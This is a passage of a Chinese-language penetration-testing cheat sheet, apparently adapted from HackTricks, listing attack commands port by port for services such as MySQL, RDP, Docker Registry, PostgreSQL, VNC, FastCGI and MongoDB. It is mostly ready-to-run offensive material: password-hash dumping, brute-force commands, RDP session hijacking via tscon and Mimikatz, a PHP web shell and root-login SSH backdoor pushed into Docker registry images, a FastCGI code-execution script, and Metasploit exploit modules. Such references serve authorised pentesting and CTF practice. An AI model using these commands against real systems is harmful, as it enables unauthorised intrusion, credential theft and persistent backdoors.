SELECT User,Host,authentication_string FROM mysql.user;

mysql -u root --password=<PASSWORD> -e "SELECT User,Host,authentication_string FROM mysql.user;"

自动化

1
2
3
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

refer:

3389-RDP

服务指纹

1
2
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

登录连接

1
2
3
4
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
xfreerdp /u:[domain\]<username> /pth:<hash> /v:<IP>

暴力破解

1
2
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

服务枚举

1
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

会话窃取

1
2
3
4
5
6
7
8
9
1)获取打开的会话
query user

2)访问所选会话
tscon <ID> /dest:<SESSIONNAME>

3)Mimikatz
ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

refer:

3690-svn

服务信息

1
2
PORT     STATE SERVICE
3690/tcp open  svnserve Subversion

Banner抓取

1
nc -vn {host} 3690

服务枚举

1
2
3
4
svn ls svn://10.10.10.203 #list
svn log svn://10.10.10.203 #Commit history
svn checkout svn://10.10.10.203 #Download the repository
svn up -r 2 #Go to revision 2 inside the checkout folder

5000-Docker Registry

服务枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#List repositories
curl -s http://10.10.10.10:5000/v2/_catalog
{"repositories":["alpine","ubuntu"]}

#Get tags of a repository
curl -s http://192.251.36.3:5000/v2/ubuntu/tags/list
{"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}

#Get manifests
curl -s http://192.251.36.3:5000/v2/ubuntu/manifests/latest

#Download one of the previously listed blobs
curl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar

#Inspect the insides of each blob
tar -xf blob1.tar  #After this,inspect the new folders and files created in the current directory

Docker枚举

1
2
3
4
5
6
7
8
9
10
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull ip:5000/ubuntu

#Check the commands used to create the layers of the image
docker history IP:5000/ubuntu

#Run and get a shell
docker run -it IP:5000/ubuntu bash  #Leave this shell running
docker ps   #Using a different shell
docker exec -it 7d3a81fe42d7 bash  #Get ash shell inside docker container

暴力破解

1
2
3
4
5
hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

---

curl -k -u username:password https://ip:5000/v2/_catalog

Web后门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
1)创建后门:shell.php

<?php echo shell_exec($_GET["cmd"]); ?>

2) 创建Dockerfile

FROM IP:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php

3) 创建镜像然后push

docker build -t IP:5000/wordpress .
docker images
docker push registry:5000/wordpress

SSH镜像后门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
1) 如果通过Docker Registry发现SSH镜像,可设置后门

docker pull 10.10.10.10:5000/sshd-docker-cli
docker run -d 10.10.10.10:5000/sshd-docker-cli

2) 从SSH镜像提取sshd_config

docker cp 4c989242c714:/etc/ssh/sshd_config .

将其修改为:PermitRootLogin yes

3) 创建Dockerfile

FROM 10.10.10.10:5000/sshd-docker-cli
COPY sshd_config /etc/ssh/
RUN echo root:password | chpasswd

4) 创建镜像然后push

docker build -t 10.10.10.10:5000/sshd-docker-cli .
docker images
docker push registry:5000/sshd-docker-cli #Push it

refer:

5432-5433: Postgresql

服务指纹

1
2
PORT     STATE SERVICE
5432/tcp open  pgsql

连接命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
psql -U <myuser>   # Open psql console with user
psql -h <host> -U <username> -d <database>   # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database>   # Remote connection

---

psql -h localhost -d <database_name> -U <User> #Password will be prompted
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles

#Read a file
CREATE TABLE demo(t text);
COPY demo from '[FILENAME]';
SELECT * FROM demo;

#Write ascii to a file (copy to cannot copy binary data)
COPY (select convert_from(decode('<B64 payload>','base64'),'utf-8')) to 'C:\\some\\interesting\path.cmd'; 

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;

#Check if current user is superiser
SELECT current_setting('is_superuser');   #If response is "on" then true, if "off" then false

#Check if plpgsql is enabled
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql'

#Change password
ALTER USER user_name WITH PASSWORD 'new_password';

#Check users privileges over a table (pg_shadow on this example)
SELECT grantee, privilege_type 
FROM information_schema.role_table_grants 
WHERE table_name='pg_shadow'

#Get users roles
SELECT 
      r.rolname, 
      r.rolsuper, 
      r.rolinherit,
      r.rolcreaterole,
      r.rolcreatedb,
      r.rolcanlogin,
      r.rolconnlimit, r.rolvaliduntil,
  ARRAY(SELECT b.rolname
        FROM pg_catalog.pg_auth_members m
        JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
        WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;

服务枚举

1
2
msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection

暴力破解

1
2
3
4
5
6
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

攻击利用

1
2
3
4
5
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload

refer:

5800/5801/5900/5901-VNC

服务枚举

1
2
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p <PORT> <IP>
msf> use auxiliary/scanner/vnc/vnc_none_auth

暴力破解

1
2
3
4
5
6
7
8
9
10
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

VNC连接

1
vncviewer [-passwd passwd.txt] <IP>::5901

VNC解密

1
2
3
4
5
6
默认密码存储位置: ~/.vnc/passwd

# 解密:https://github.com/jeroennijhof/vncpwd

make
vncpwd <vnc password file>

refer:

5984/6984-CouchDB

自动枚举

1
2
nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum

手工枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
1)Banner获取
curl http://IP:5984/

2)Database List
curl -X GET http://IP:5984/_all_dbs
curl -X GET http://user:password@IP:5984/_all_dbs

3)Database Info
curl http://IP:5984/<database>
curl http://localhost:5984/simpsons

4)Document List
curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs

5)Read Document
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9

暴力破解

1
2
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

refer:

8009-AJP

服务指纹

1
2
PORT     STATE SERVICE
8009/tcp open  ajp13

服务枚举

1
nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 <IP>

暴力破解

1
nmap --script ajp-brute -p 8009 <IP>

8086-InfluxDB

认证枚举

1
2
3
4
5
6
7
8
9
1)无认证
influx -host 'host name' -port 'port #'
> use _internal

2)有认证
influx –username influx –password influx_pass

3)自动化枚举
msf6 > use auxiliary/scanner/http/influxdb_enum

常用命令

1
2
3
4
5
6
7
> show databases

> show measurements  #显示SQL表

> show field keys    #显示字段键值:列

> select * from cpu  #dump the table

9000-FastCGI

RCE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

refer:

9200/9300: Elasticsearch

认证验证

1
2
3
curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"  #无认证

curl -X GET http://user:password@IP:9200/  #有认证

暴力破解

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

用户枚举

1
2
3
4
5
6
7
8
9
10
#List all roles on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role"

#List all users on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"

#Get more information about the rights of an user:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"

msf > use auxiliary/scanner/elasticsearch/indices_enum

refer:

11211-Memcache

服务枚举

1
2
3
4
5
6
7
8
9
10
echo "version" | nc -vn -w 1 <IP> 11211      #Get version
echo "stats" | nc -vn -w 1 <IP> 11211        #Get status
echo "stats slabs" | nc -vn -w 1 <IP> 11211  #Get slabs
echo "stats items" | nc -vn -w 1 <IP> 11211  #Get items of slabs with info
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211  #Get key names (the 0 is for unlimited output size)
echo "get <item_name>" | nc -vn -w 1 <IP> 11211  #Get saved info

#This php will just dump the keys, you need to use "get <item_name> later"
sudo apt-get install php-memcached
php -r '$c = new Memcached(); $c->addServer("localhost", 11211); var_dump( $c->getAllKeys() );'

工具枚举

1
2
3
4
sudo apt install libmemcached-tools
memcstat --servers=127.0.0.1 #Get stats
memcdump --servers=127.0.0.1 #Get all items
memccat  --servers=127.0.0.1 <item1> <item2> <item3> #Get info inside the item(s)

自动化

1
2
3
nmap -n -sV --script memcached-info -p 11211 <IP>    #Just gather info
msf > use auxiliary/gather/memcached_extractor       #Extracts saved data
msf > use auxiliary/scanner/memcached/memcached_amp  #Check is UDP DDoS amplification attack is possible

15672-RabbitMQ Management

启动插件

1
2
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart

暴力破解

1
2
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for httpS

API使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
1)API信息

http://localhost:15672/api/connections

2)使用API发布信息

POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267

{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"[email protected]\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}

refer: https://book.hacktricks.xyz/pentesting/15672-pentesting-rabbitmq-management

27017/27018: MongoDB

自动枚举

1
nmap -sV --script "mongo* and default" -p 27017 <IP>   #By default all the nmap mongo enumerate scripts are used

手动枚举

1
2
3
4
5
6
7
8
9
10
11
from pymongo import MongoClient
client = MongoClient(host, port, username=username, password=password)
client.server_info() #Basic info
#If you have admin access you can obtain more info
admin = client.admin
admin_info = admin.command("serverStatus")
cursor = client.list_databases()
for db in cursor:
    print(db)
    print(client[db["name"]].list_collection_names())
#If admin access, you could dump the database also

连接登录

1
2
3
4
mongo <HOST>
mongo <HOST>:<PORT>
mongo <HOST>:<PORT>/<DB>
mongo <database> -u <username> -p '<password>'

暴力破解

1
2
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login

refer: https://book.hacktricks.xyz/pentesting/27017-27018-mongodb

Reference